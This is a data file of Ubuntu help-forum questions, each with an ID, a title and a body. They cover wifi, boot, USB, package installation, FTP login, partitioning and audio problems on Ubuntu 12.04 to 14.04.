468406	wifi is disabled and network applet 's `` enable wfi '' is not clickable	every time in network settings , airplane mode switches on itself . on running $ nmcli nm in terminal : running : running state : connected wifi-hardware : disabled wifi : disabled wwan-hardware : enabled wwan : enabled i do n't know how to enable wifi-hardware and wifi . also using `` sudo rfkill unblock wifi '' is not working . i also checked this : $ sudo rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : yes
468407	starting a terminal in desktop ( ubuntu 14.04 )	anyone know how to start a ( linux ) terminal in ubuntu 14.04 desktop ? i could not find an icon for it on the task menu bar along the side of the desktop . : ( thanks ahead ! ! !
468419	macbook starts with the screen on minimum brightness	i have a macbook2,1 with ubuntu 12.04 . when i start the computer the back light is on and i can see all of the boot stuff . once the gui begins to start up the backlight is turned completely off and i can not see anything . i do however hear the little ubuntu drum beat , can then type my password and log on . once i have done this i can then use the brightness buttons to turn the brightness back up but the logon screen is always just blackness . i can control the brightness from the command line using echo 500 | sudo tee /sys/class/backlight/intel_video/brightness and i put this line into /etc/rc.local before the exit 0 but this doesnt do anything . how can i get the brightness back up when the gui starts up ?
468422	can i put ubuntu on my android incredible 2 ?	i was sifting through some material online , and i seen one video , and it looked like somebody pulled if off , i will admit i 'm new to doing this sort of things to phones , and also if you can make it happen , does everything run ok ?
468429	ubuntu wo n't finish booting	so i have a windows 8 pc that also can run ubuntu ( my computer is a dell inspiron ) but every time i try to run ubuntu it takes about 2 minutes and then shuts off my computer . i do n't understand why . does anybody know why this happens and how i can fix it ?
468430	usb keyboard and mouse not working when both are plugged into motherboard usb ports	i 'm facing a problem whereby neither my keyboard nor my mouse work if they 're both plugged into the usb ports on the back of my motherboard . the keyboard i 'm using is a razer blackwidow and the mouse is a razer deathadder . the motherboard in question is the gigabyte h77n-wifi . however , both the keyboard and the mouse do work if i plug the mouse into the usb 3.0 port on the front of the case , which is connected to a usb header on the motherboard . i noticed that when i boot the pc with the keyboard and mouse plugged into the back motherboard ports i get this before the login screen : unfortunately i 'm not linux savvy enough to know what that means and google unfortunately returns mostly irrelevant results . this used to happen on ubuntu 13.10 , however i mostly ignored it hoping that the upgrade to 14.04 will fix it but it has n't . i 'd really like to get back the use of a front usb port , so any help is greatly appreciated . update : after a little more investigation , this seems to only be an issue if i plug the keyboard and mouse into usb 2.0 ports . if i have one in a usb 2.0 and the other in a usb 3.0 ( both on the back of the motherboard ) this problem does n't occur . regardless , i 'd still like to not have to use up a usb 3.0 port for a mouse as i have other devices like external hard drives which would benefit greatly from usb 3.0 , so i 'm still looking for a solution .
468432	qt5-default package not found	i am trying to do : sudo apt-get installl qt5-default reading package list ... done building dependency tree reading state information ... done e : unable to locate package qt5-default on a qt-forum i found out i could try to add something like this to the /etc/apt/sources.list : deb http : //http.debian.net/debian jessie main but i ca n't save it when i am done adding the line . i did while i am in the right directory : sudo vim sources.list # and i also tried 'vi' i am trying to this on ubuntu server 12.04 . i was able to update the qmake version on my laptop with ubuntu 14.04 . so what i would like know is how can i upgrade my qmake from 4 to 5 . and how do i exit and save such files as i mentioned ? i tried [ esc ] + : + q + [ enter ] edit 1 i have now successfully edited the sources.list file . but now after doing sudo apt-get update . i get the following error : w : gpg error : http : //http.debian.net jessie main jessie release : the following signatures could n't be verified because the public key is not available : no_pubkey [ 16 char hexadecimal number ] i though maybe it is n't something critical i continued with install qt5-default , but that did n't seem to work either , because i a few errors which i ca n't reproduce . i did qmake -- version , but that still returned : qmake version 2.01a using qt version 4.8.1 in /usr/lib/i386-linux-gnu`
468433	getting errors when i try to install lubuntu from the terminal	i 've been trying to install the lubuntu desktop , but it gives me this error . is there anything i can do , or should i not even try ? i 'm new at this , please make it simple . sudo apt-get install lubuntu-desktop reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : lubuntu-desktop : depends : lubuntu-core but it is not going to be installed e : unable to correct problems , you have held broken packages .
468434	self-compiled ffmpeg , checkinstall and apt dependencies	i 've compiled ffmpeg and installed it with checkinstall . now , i 'm trying to install opencv development files , but it wants to install libavcodec-dev libavcodec54 libavformat54 libavutil-dev libavutil52 from ubuntu 's repositories , which breaks ffmpeg . i tried using these checkinstall flags -- provides='libavcodec54 , libavdevice53 , libavfilter3 , libavformat54 , libavresample1 , libavutil52 , libswscale2 , libpostproc52 , libavcodec-dev , libavdevice-dev , libavfilter-dev , libavformat-dev , libavresample-dev , libavutil-dev , libswscale-dev , libpostproc-dev ' -- replaces='libavcodec54 , libavdevice53 , libavfilter3 , libavformat54 , libavresample1 , libavutil52 , libswscale2 , libpostproc52 , libavcodec-dev , libavdevice-dev , libavfilter-dev , libavformat-dev , libavresample-dev , libavutil-dev , libswscale-dev , libpostproc-dev' but it does n't help . how can i install applications using apt-get that depend on libav/ffmpeg libraries ? is it possible without recompiling ffmpeg as static binary ?
468437	where can i get a mac image of ubuntu 14.04 lts	i am attempting to install ubuntu on my macbook pro , but when i attempt to download the mac desktop image ( as opposed to the regular 32bit or 64bit edition ) from the normal ubuntu websire , i am given a 404 error from all mirrors . it seems this image does not exist for 14.04 . i have found the image for 14.10 , but i would prefer to use a lts edition . does anyone know where i can find this image ?
468438	i used wubi to install 12.04 and update to 13.10 . how can i switch to a real disk partion for 14.04 but keep all my custom programs and settings ?	i think wubi is an excellent tool , and it 's a shame it 's been discontinued , but i 'm ready to use a real disk install because apparently it will speed up ubuntu noticeably . however , i have a lot of custom settings and themes and programs installed and i would like to preserve these . is there some way to backup my system the way i have it and restore it to that from a clean install of 14.04 ? if not , i 'd prefer to stick with wubi . thanks in advance .
468439	certain programs will run but not open	when opening , say vlc or qbittorrent , they will appear in the launcher ( taskbar ) but will not open the gui to let me interact with the program . the name does n't appear at the top , even . if i click anywhere it says that i am back at the ubuntu desktop at the top . others programs such as firefox and rhythmbox will work . vlc and qbittorrent where installed from the ubuntu software center without error . not even the system monitor will open . i reinstalled ubuntu and completely erased my previous version . i also noticed that a unknown display was activated and a launcher was enabled there as well as my main monitor . i disabled it and set the launcher to only activate on my main display . this fixed all the problems .
468441	proftp incorrect password	i have proftp server installed , and i am trying to log in with a system user that i have created : useradd newuser -s /bin/false -m passwd newuser but when i try to log in from my client , it keeps coming back with : 530 login incorrect i am definitely using the right password i read here that it could be a problem due to some incorrect settings on the default pam security settings of proftpd in /etc/pam.d/proftpd . which says to change it to : # % pam-1.0m-1.0 auth required pam_listfile.so item=user sense=deny file=/etc/ftpusers onerr=succeed auth required pam_shells.so auth include system-auth account include system-auth # session include system-auth session required pam_loginuid.so but still no luck the server errors im getting are : /var/log/auth.log : may 17 22:40:16 fileserver proftpd : pam ( proftpd ) illegal module type : onerr=succeed /var/log/auth.log : may 17 22:40:16 fileserver proftpd : pam pam_parse : expecting return value ; [ ... auth ] /var/log/auth.log : may 17 22:40:16 fileserver proftpd : pam _pam_load_conf_file : unable to open /etc/pam.d/system-auth /var/log/proftpd/proftpd.log:2014-05-17 22:40:16,968 fileserver proftpd [ 1159 ] fileserver ( 192.168.0.120 [ 192.168.0.120 ] ) : ftp session opened . /var/log/proftpd/proftpd.log:2014-05-17 22:40:16,984 fileserver proftpd [ 1159 ] fileserver ( 192.168.0.120 [ 192.168.0.120 ] ) : user newuser ( login failed ) : incorrect password . /var/log/proftpd/proftpd.log:2014-05-17 22:40:16,985 fileserver proftpd [ 1159 ] fileserver ( 192.168.0.120 [ 192.168.0.120 ] ) : ftp session closed . when i use the original /etc/pam.d/proftpd file , the auth.log errors are : /var/log/auth.log : may 17 22:48:21 fileserver proftpd : pam_unix ( proftpd : session ) : session opened for user newuser by ( uid=0 ) /var/log/auth.log : may 17 22:48:21 fileserver proftpd : pam_unix ( proftpd : session ) : session closed for user newuser anyone had this problem before , or know how to fix it ?
468442	how to configure xdemorse	xdemorse is a morse code decoding software . but i do n't know how to configure it . i keep getting this error message : in the terminal i get a message , too- '' no such file or directory '' does anyone know how to configure this software ? i printed the usermanual , but it leaves some questions unanswered . i found the name of the configuration file , too . for anyone who is interested it is /usr/share/doc/xdemorse . also , i managed to get sound to come from my computer and not the radio . the trick now is just getting the software the identify and put into text the different sounds . any help is appreciated , thank you .
468444	what does ? in output of ls -la mean ?	i 'm having trouble with my webserver an noticed that the output of ls -la /var/www contains irregularily ? instead of permission digits , e.g . $ language=c ls -la /var/www/ ls : can not access /var/www/dokuwiki : permission denied ls : can not access /var/www/joomla : permission denied ls : can not access /var/www/.. : permission denied ls : can not access /var/www/index.html : permission denied ls : can not access /var/www/mediawiki : permission denied ls : can not access /var/www/html : permission denied ls : can not access /var/www/postfixadmin : permission denied ls : can not access /var/www/awffull : permission denied ls : can not access /var/www/index.lighttpd.html : permission denied ls : can not access /var/www/drupal : permission denied ls : can not access /var/www/sarg : permission denied ls : can not access /var/www/ . : permission denied ls : can not access /var/www/trac : permission denied total 0 d ? ? ? ? ? ? ? ? ? ? ? ? ? ? . d ? ? ? ? ? ? ? ? ? ? ? ? ? ? .. d ? ? ? ? ? ? ? ? ? ? ? ? ? ? awffull d ? ? ? ? ? ? ? ? ? ? ? ? ? ? dokuwiki d ? ? ? ? ? ? ? ? ? ? ? ? ? ? drupal d ? ? ? ? ? ? ? ? ? ? ? ? ? ? html - ? ? ? ? ? ? ? ? ? ? ? ? ? ? index.html - ? ? ? ? ? ? ? ? ? ? ? ? ? ? index.lighttpd.html d ? ? ? ? ? ? ? ? ? ? ? ? ? ? joomla d ? ? ? ? ? ? ? ? ? ? ? ? ? ? mediawiki d ? ? ? ? ? ? ? ? ? ? ? ? ? ? postfixadmin d ? ? ? ? ? ? ? ? ? ? ? ? ? ? sarg d ? ? ? ? ? ? ? ? ? ? ? ? ? ? trac sudo ls -la /var/www produces $ sudo ls -la /var/www/ insgesamt 52 drwxr -- r -- 11 www-data www-data 4096 mai 17 23:37 . drwxr-xr-x 15 root root 4096 apr 27 14:51 .. drw-r -- r -- 2 www-data www-data 4096 mai 12 15:34 awffull drwxr-xr-x 2 www-data www-data 4096 apr 21 23:55 dokuwiki drwxr-xr-x 2 www-data www-data 4096 apr 21 23:55 drupal drw-r -- r -- 2 www-data www-data 4096 apr 3 14:21 html -rw-r -- r -- 1 www-data www-data 177 apr 21 23:54 index.html -rw-r -- r -- 1 www-data www-data 3568 mai 1 11:13 index.lighttpd.html drwxr-xr-x 2 www-data www-data 4096 apr 21 23:55 joomla drwxr-xr-x 2 www-data www-data 4096 apr 27 18:58 mediawiki drwxr-xr-x 2 www-data www-data 4096 apr 21 23:55 postfixadmin drw-r -- r -- 2 www-data www-data 4096 mai 12 15:05 sarg drwxr-xr-x 2 www-data www-data 4096 apr 21 23:55 trac which corresponds to the result of my chmod and chown invokations ( after the problem occured ) . the directories dokuwiki , drupal , joomla , mediawiki trac are mount points ( options rw , bind ) of another partitions . i invoked ls with both mounted and unmounted directories . everything worked like a charm on ubuntu 13.10 .
468445	how to backup guake 's settings	i 've worked a lot on configuring guake to my needs but i ca n't find a way to export these changes ( does n't seem to be related to gnome-terminal 's profiles ) . is there a way to backup my `` guake profile '' and then restore it in another pc ?
468446	asus laptop and faulty usb 3.0	i have weir issue with my asus laptop in have only one usb3.0 and it works , sometimes.. sometimes it just dies . $ dmesg | grep xhci_hcd [ 1.488284 ] xhci_hcd 0000:04:00.0 : xhci host controller [ 1.488289 ] xhci_hcd 0000:04:00.0 : new usb bus registered , assigned bus number 3 [ 1.499021 ] xhci_hcd 0000:04:00.0 : irq 45 for msi/msi-x [ 1.499027 ] xhci_hcd 0000:04:00.0 : irq 46 for msi/msi-x [ 1.499033 ] xhci_hcd 0000:04:00.0 : irq 47 for msi/msi-x [ 1.499039 ] xhci_hcd 0000:04:00.0 : irq 48 for msi/msi-x [ 1.499045 ] xhci_hcd 0000:04:00.0 : irq 49 for msi/msi-x [ 1.499052 ] xhci_hcd 0000:04:00.0 : irq 50 for msi/msi-x [ 1.499058 ] xhci_hcd 0000:04:00.0 : irq 51 for msi/msi-x [ 1.499063 ] xhci_hcd 0000:04:00.0 : irq 52 for msi/msi-x [ 1.499205 ] usb usb3 : manufacturer : linux 3.11.0-20-generic xhci_hcd [ 1.499349 ] xhci_hcd 0000:04:00.0 : xhci host controller [ 1.499352 ] xhci_hcd 0000:04:00.0 : new usb bus registered , assigned bus number 4 [ 1.499391 ] usb usb4 : manufacturer : linux 3.11.0-20-generic xhci_hcd [ 48439.672080 ] usb 3-1 : new high-speed usb device number 2 using xhci_hcd [ 48439.984535 ] usb 3-1.1 : new high-speed usb device number 3 using xhci_hcd [ 48440.096651 ] usb 3-1.2 : new full-speed usb device number 4 using xhci_hcd [ 48440.216924 ] usb 3-1.3 : new high-speed usb device number 5 using xhci_hcd [ 48440.320911 ] usb 3-1.4 : new full-speed usb device number 6 using xhci_hcd [ 48440.452843 ] usb 3-1.1.4 : new high-speed usb device number 7 using xhci_hcd [ 48440.808690 ] usb 4-1 : new superspeed usb device number 2 using xhci_hcd [ 48441.438322 ] usb 4-1.1 : new superspeed usb device number 3 using xhci_hcd [ 48442.070953 ] usb 4-1.1.1 : new superspeed usb device number 4 using xhci_hcd [ 48450.478931 ] xhci_hcd 0000:04:00.0 : xhci host not responding to stop endpoint command . [ 48450.478938 ] xhci_hcd 0000:04:00.0 : assuming host is dying , halting host . [ 48450.478982 ] xhci_hcd 0000:04:00.0 : hc died ; cleaning up [ 48453.478077 ] xhci_hcd 0000:04:00.0 : timeout while waiting for configure endpoint command [ 48453.478087 ] xhci_hcd 0000:04:00.0 : abort the command ring , but the xhci is dead . even reboot ca n't help , only power off/on . with usb 2.0 everything is fine laptop model k53s . kernel linux mf-laptop 3.11.0-20-generic # 35-ubuntu smp fri may 2 21:32:49 utc 2014 x86_64 x86_64 x86_64 gnu/linux and also not clear how to put this kind of bug in bugzilla . i 've wrote too asus tech support they say that driver update will help only issue is that this driver for win7 .
468448	connect to the internet with static ip , netmask , and dns addresses	i have installed ubuntu for the first time and i tried to connect to the internet but generally when i connect to that network in widnows the ip address must be set manually by specifing the ip , the subnet mask and the dns . how can i achieve that in ubuntu so to connect to the internet ?
468449	need help about ar9285 patch	hello everyone i need a help to find the patch of my wireless driver `` ar9285 '' ( qualcomm atheros ) please could you guide me to this ? thank very much in advance
468451	ubuntu 14.04 guest in hyper-v host will not run apt-get	i have a problem running apt-get ( or any other command that requires a download ) on ubuntu 14.04 guest running in hyper-v ( w28k ) server . the download always fails because the connection times out . it is not a problem with the ubuntu archives as i have tried several and also get the same problem with all other third party archives . however , the internet connection from the ubuntu server works fine as i can ping from it successfully and connect into it from outside with ssh or to the web server it is running . the guest linux machine has a static ip and uses the external hyper-v connection that i have set up for all other guest oss running on the host . it seems that the linux guest can make outgoing icmp connections to the internet ( which is why i get correct ping results ) but can not receive communications to complete the connection . without apt-get working i can not do anything with this guest server .
468453	can i save this machine ?	hey all i 'm low on computer skills and need some help on how and which os to replace my windows xp it 's an older e machine amd athlon 64 processor 2.2ghz 1600mhzfsb
468455	qml hud integration without mainview ?	i 'm working on an app with qt quick components , i do n't want to use any ubuntu specific components because i want the desktop version of my app to be more portable than that ( qt 5.2 is enough of a dependency ) . so my question is this , is there a good way to add hud functionality with qml without using mainview ? i would n't rule out using c++ either ( my app is already mixing qml and c++ ) .
468456	connect but no internet	i am returning user at ubuntu , and i can not come online or use software center , and the wireless say connected , and i try enter in the terminal : rfkill list and it say no soft block and no hard block , and i try enter in terminal : lspci and say ( atholen wireless on pci ) , and i try enter in the terminal : lsmod wlan0 and say lsmod : users , and since i can not use nmap to scan hosts if it is up when nmap is not install , and i tried making a script called network.d i enter : # bin/sh case ! [ $ ] in ./bin/sh nmcli nm -c asleep=false -network easc and still not online , can some one please help me come back online .
468457	how can i scrub through a video for saving screengrabs frame by frame ?	is there a linuxsoftware suitable for this ? unfortunately vlc does n't let me do that .
468463	installation issue- emmet , pyv8-linux 64 bit , sublime text 2	i recently began learning to code , and have run into some challenging installation issues . i recently installed emmet in sublime text 2 running in ubuntu 12.04 . emmet installed just fine , however after `` manually '' installing the pyv8-linux 64 bit binary , by copying and pasting the two files from the zip folder into a folder i created in st2 's packages folder , emmet still is n't working . and , in st 's console i 'm getting an error message . for those of you who are familiar with this , your help is appreciated ! the full error message from the console is listed below . thanks . ... reloading plugin /home/dqcrevive/.config/sublime-text-2/packages/emmet/emmet-plugin.py pyv8 : creating new thread emmet : creating thread emmet : loading https : //api.github.com/repos/emmetio/pyv8-binaries/contents reloading plugin /home/dqcrevive/.config/sublime-text-2/packages/html/encode_html_entities.py reloading plugin /home/dqcrevive/.config/sublime-text-2/packages/html/html_completions.py reloading plugin /home/dqcrevive/.config/sublime-text-2/packages/package control/package control.py reloading plugin /home/dqcrevive/.config/sublime-text-2/packages/pyv8/pyv8.py plugin init time : 0.793147 loading bindings loading pointer bindings found 1 files for base name default.sublime-theme theme loaded app ready pre session restore time : 0.962301 using gamma : 1 ( err : 0 ) startup cache , total files : 103 cache hits : 103 startup time : 1.10101 ( package setup was not run ) loaded 837 snippets emmet : loading pyv8 binary from https : //raw.github.com/emmetio/pyv8-binaries/master/pyv8-linux64.zip exception in thread thread-104 : traceback ( most recent call last ) : file `` .\threading.py '' , line 532 , in __bootstrap_inner file `` .\threading.py '' , line 736 , in run file `` ./emmet/pyv8loader.py '' , line 271 , in run return self.trigger ( 'error ' , exit_code=self.thread.exit_code , progress=self ) file `` ./emmet/pyv8loader.py '' , line 290 , in trigger c ( *args , **kwargs ) typeerror : on_error ( ) got an unexpected keyword argument 'progress' package control : no updated packages
468466	why this occurs error : diskfilter writes are not supported	this message occurs when leaving the grub menu and before the ubuntu splash screen . how do i fix the problem to clear the message ? and what doe is it mean ? error : diskfilter writes are not supported system boots and seems to work just fine .
468467	black screen with blinking cursor after dual boot install 14.04	i have just installed ubuntu 14.04 on my toshiba laptop along side windows 7 . when the menu comes up to choose which os to boot into , i can easily boot into windows 7 . i can not successfully boot into ubuntu . all i get is a blinking cursor on a black/purple screen . i attempted the nomodeset trick , which was a bit more successful . i got a screen with a lot of code , but then it stopped with a blinking cursor at the bottom and would n't load anymore . as a last resort , would returning my laptop to factory settings get rid of linux and the partitions made to the drive ? i already did this to my laptop when it was just windows , which is why i thought i might as well try to add ubuntu . but it 's a lengthy process , and if it wo n't get rid of the partitions and ubuntu , i wo n't bother . i appreciate any help ~many thanks
468471	skype not responding to ubuntu	i 'm having problems downloading skye to ubuntu that my sister 's husband installed on my acer aspire one computer . the acer once had windows 7 on it with 1 gb ddr3 memory , and i was wondering if ubuntu is compatible with skype from new hardware installed . the original webcam is still located on the computer , but i could not find it 's icon through ubuntu after ubuntu was installed . therefore , i had to download a program called cheese for ubuntu to upload the new webcam info . can someone please assist me with information concerning skype to download to ubuntu for acer . 20 % of my account remains open until skype finishes downloading and has requested to convert this information to the computer . how to solve this ?
468474	i ca n't open systen settings nor sound settings	when i click on the little gear symbol and then system settings nothing happens . when i click on the little speaker and then sound settings nothing happens . how do i fix this ?
468479	upgrade to 14.04 failed : segmentation fault on su	i just upgraded my 64 bit amd desktop xubuntu to 14.04 after easy , successful upgrades of 2 other machines to lubuntu . there were numerous errors during the upgrade and now it seem to be in an almost unusable state . i can not su - without getting a segmentation fault and the software updater crashes . skype does n't work with pulse audio - no sound output . i would be grateful if someone could point me in the right direction . i have been using ubuntu successfully for over 7 years and this is the worst upgrade i have ever had . might add that there was a question about retaining the root privileges or replacing them during the installation . i tried to answer keep but was warned that this could cause problems so i answered replace . also i saw something about encryption of the disk device and , if the key is different from the previous release this could cause problems . tia
468483	where can i find the refind.conf configuration file ?	i 'm in the process of installing ubuntu 14.04 lts on macbook pro 13inch retina display with the end goal of having a dual boot setup with os x. i 'm using refind as my boot manager , and since i have disk encryption enabled on my os x partition , i ca n't install refind on my mac os x partition . to work around this i created a separate 1gb partition just for the refind boot manager and installed refind on it using install.sh with the -- ownhfs and -- alldrivers options . currently my diskutil list output looks like this : my-macbook-pro : ~ yatin $ diskutil list /dev/disk0 # : type name size identifier 0 : guid_partition_scheme *251.0 gb disk0 1 : efi efi 209.7 mb disk0s1 -- esp 2 : apple_hfs refind_bootmgr 864.0 mb disk0s2 -- custom hfs refind partition 3 : apple_hfs os x 82.9 gb disk0s3 -- os x 4 : apple_boot recovery hd 650.0 mb disk0s4 5 : 0fc63daf-8483-4772-8e79-3d69d8477de4 83.5 gb disk0s5 -- ubuntu 6 : linux swap 14.5 gb disk0s6 7 : 0fc63daf-8483-4772-8e79-3d69d8477de4 68.4 gb disk0s7 -- shared volume now when i boot up my mac , i see refind 's boot selector which displays three entries , one for ubuntu , one for my mac and a third for grub . i would like to remove the grub refind entry since it serves no purpose given that refind is booting my ubuntu image directly , but i 'm unable to find the refind.conf file . i do n't see the refind.conf under the usual location on the refind_bootmgr volume ie /efi/refind/refind.conf . where should it be located ?
468492	how to set tab to produce four spaces in ubuntu	i would like to be able to run a command which makes the tab key produce four spaces and to be able to run another command to reinstate the previous behaviour . i am aware that keys can be remapped using xmodmap , but i do n't know how to set things such that one keystroke can produce multiple characters . please note that i want this to apply to ubuntu generally , not to a single application .
468494	command line failing with https	i 'm a bit new when it comes to networking . as a disclaimer , i installed chrubuntu . the os was able to connect fine , but it had an unrelated error and required an install and upgrade from 13.10 to 14.04 . i can open any https and http site in a browser . i can call updates and sites with apt-get update , curl , and wget . however these commands plus easy_install and pip do n't work when dealing with https . what can i do ? i 've seen a few questions with the output of ifconfig so here 's that : eth0 link encap : ethernet hwaddr e0:00:00:0f:97 : b6 inet addr:192.168.1.110 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :e200 : ff : fe0f:97b6/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:30020 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:38429042 ( 38.4 mb ) tx bytes:2171804 ( 2.1 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:131 errors:0 dropped:0 overruns:0 frame:0 tx packets:131 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:49893 ( 49.8 kb ) tx bytes:49893 ( 49.8 kb )
468497	typing my network password without keyboard	i have a device with only one usb port ( beaglebone black ) , and i would like to connect to a wifi network on it . i recently purchased an asus usb n-13 , which works out of the box on ubuntu 14.04 . the device comes on , but the problem is that since it takes up my only usb port , i ca n't use a keyboard to connect to my password-protected network , and if i connect to the network via ethernet cable , the wireless receiver does not get activated ( no led lit up ) . is there any way to solve this issue without purchasing a usb hub ? my preferred solution would be to enable the wireless receiver while i have an ethernet cable plugged in , but i can not figure out how to do that .
468499	improve kde font rendering for 15 '' full hd display	i have used these setting -enable anti aliasing -rgb sub pixel hitting this has improved the font rendering a lot compared to default setting . could you suggest me other fine tuning ? my display is 15 '' full hd . what `` force dpi '' ideal value for my display ?
468500	moodle slow on client side	running kubuntu 14.04 . moodle is very slow . i get server messages telling me i 've timed out . however , on my vista antique moodle runs quite well . the moodle docs pages were n't much help .
468503	how do i remove invalid shortcuts ?	how do i remove invalid ( orphaned ) shortcuts from ubuntu 14.04 ? i have wine , playonlinux and classicmenu indicator installed . i installed , then removed microsoft office 2007 because it was `` buggy '' . however , their shortcuts remain in the `` other '' subfolder of classicmenu indicator . suggesions , please .
468504	kubuntu 14.04 as guest in virtualbox on win 7 host	i 'm running kubuntu 14.04 guest in virtualbox with win 7 host . i have video issues . videos frequently appear on top of everything else , even things they should n't - like menus . if i drag a player on the screen , the video stays where it is until i release the player , then the video snaps into the frame again . i 've found that in vlc by changing the video output setting to `` x11 video output ( xcb ) '' i can make the problem go away , but that 's only in vlc . i 'd like to fix it system-wide , but i ca n't find any settings . since i 'm in a virtualbox , i do n't believe i have any options on the video card beyond the provided innotek virtualbox graphics adapter
468506	ubuntu 14.04 manual hard drive partitioning help needed	i 'm in need of some assistance with manual partitioning from the ubuntu 14.04 install gui . i 'm trying to do a fresh install of ubuntu 14.04 desktop . i have a 60gb ssd as that i want all my os files on ( root , home , etc . ) , and then i have 3 2tb hdds that i want to partition so i can later configure them into a raid5 array using mdadm . i want my 60gb drive to be encrypted as well as my 3-drive raid array . what would be the easiest way of doing this ? should i use the default encryption for the ssd and encrypt my raid drives later on once i have the raid array configured ? do i encrypt the raid array or the 3 individual drives ? i 'm new to the ubuntu manual partitioning and do n't quite understand how to assign mount points and how to size swap partitions . i 've also had trouble with disk alignment in the past regarding the raid array disks . any support at all would be greatly appreciated . if anyone could link some tutorials or give me a quick walkthrough on partitioning with multiple drives it would be much appreciated . overview of request ( for clarity ) : drive1 ( ssd 60gb ) : encrypted , boot drive ( / , /home , etc . ) drive2 ( hdd 2tb ) : disk1 raid array drive3 ( hdd 2tb ) : disk2 raid array drive4 ( hdd 2tb ) : disk3 raid array raid array : encrypted thanks a bunch askubuntu ,
468508	how to shrink my current windows partition from ubuntu ?	was wondering how i could shrink my windows partition on my dual boot setup , considering i no longer need much space for it . i 've heard of gparted , not sure if that is fit for the job . thanks !
468516	file recovery of windows after installing ubuntu	in one of my computers i installed ubuntu 14.04 . actually , i tried to dual-boot in along with windows 7 and i tried to do the partition during the ubuntu installation procedure . now all of my 500 gb hard disk has been occupied by ubuntu and i can not access windows . since , i have all my documents in windows and i want to recover it . will i be able to recovery my files of windows ? if yes , can you please help me with the solution ?
468520	how to apply patch to ableton 9 live suite ( .auz file ) ?	i 'm just getting started with ubuntu here , so please bear with me : ) i installed ableton 9 live suite using playonlinux , and i can not apply the patch . the patch maker i downloaded generates a .auz file and i have n't been able to apply nor dragging it to ableton nor through terminal . this is what i 've tried : dragging the file : it rejects it saying the authorization file is not valid on this computer ( or system , i 'm not sure what term it uses , i 'm running this in spanish ) . i 've tried running ableton using wine and not through playonlinux , but no go . terminal : wine ableton 9 live suite.exe `` c : \programdata\ableton\live 9 suite\program\authorize.auz '' the ableton exe file is located in : .playonlinux/wineprefix/abletonlive9/drive_c/users/public/application data/ableton/live 9 suite/program and the reply i get is : wine : can not find l '' c : \\windows\\system32\\ableton.exe
468521	if i install ubuntu 14.04 on my pc , what will happen to my files ?	i have ubuntu 12.04 lts ( precise pangolin ) on my laptop , and it was not booting properly so i decided to boot from a pen drive , but as i was just installing ubuntu 14.04 ( trusty tahr ) i thought : what will happen to my older files ? i ca n't run a back up as my ubuntu 12.04 is corrupted and is not booting . so just before installing , i want to ask , what will happen to my files ? i am running ubuntu as a trial version . i am booting it directly from the drive .
468522	distro question - which ( current ) linux distro works well with older laptops	i 'm sorry , but this is going to be somewhat vague for now . i 'll update this within 24 hours with more details , or as soon as they are available . whichever comes first . i am enrolled in an engineering class that requires a year-end presentation . my presentation is a couple weeks out , and i 've just hit a roadblock . my previous plan was to haul in and hook up my desktop , but school policy changed and i 'm not allowed to do that any more . instead , my dad has allowed me to use an old laptop for my presentation . however , this is where the problems begin . his laptop is an xp machine . the software i need for my presentation is powerpoint ( or libreoffice impress ) , logger pro ( i have the .deb packages ) , and a couple more programs that i wrote , that will only work on linux . my dad has a dell vostro 1500 , which was released in 2007 . specs are here he is offering me the laptop he used for a couple years before that , so something probably released in the 2004-2005 range . i do n't have specs right now ( or even know what laptop it will be , just that it was an xp box and could run cad software ) . i am looking for a distro that has/can/is : run libreoffice install debian packages run scripts that can listen to hardware minimal system footprint preferably debian or ubuntu based , as i have experience with these distros if the older laptop works , what would be a good candidate for a distro that can do the above , while using minimal memory ? if the older laptop does not work , what distro could do the above on a dell vostro 1500 ( specs , again ) quickly and efficiently ? i am aware of options such as puppy linux and tiny core linux , but those are not good options . while they run fast , my scripts need something based off of ubuntu or debian to run and display correctly . update : the older laptop can not be found , so i am using the dell vostro 1500 . i have been allowed to partition the hdd , and added a 30gb ( the other partition has 10gb free space left ) partition . i installed xubuntu ( i have 2gb of ram , and decided to capatilize on it ) , logger pro , libreoffice , and other software i need . in fact , i am editing this from the laptop . some slight issues were had with the trackpad ( now that was fun to fix , without access to a mouse ) and wifi , but those were issues commonly had and easily fixed .
468531	changing system from stereo to mono	i am trying to configure xdemorse , a morse code decoding software . one of the things i need to do to configure is change my sound settings from stereo to mono . i think i found the answer , i just do n't know how to apply it to my specific computer . here is what i have found . pacmd list-sinks | grep name : after doing this , the computer gives this as a reply : name : < alsa_output.pci-0000_00_01.1.hdmi-stereo > name : < alsa_output.pci-0000_00_14.2.analog-stereo > then the instructions say to do this : load-module module-remap-sink_name=mono master=alsa_output.pci.0000_00_14.2.analog-stereo channels=2 channel_map=mono , mono but i keep getting this error message : load-module command not found . here is a link to the tutorial i am trying to use . i downloaded gnome alsamixer , but it looks different than the one in the tutorial . thank you all for your help .
468534	gdbus.error : org.freedesktop.policykit1.error.failed:	the log in request comes on the screen , which it did n't used to , and as soon as the desktop appears after i log in it goes blank , and repeats the login-in request . i get this error box : gdbus.error : org.freedesktop.policykit1.error.failed : i 've removed policykit from start up , but no change . any help please ?
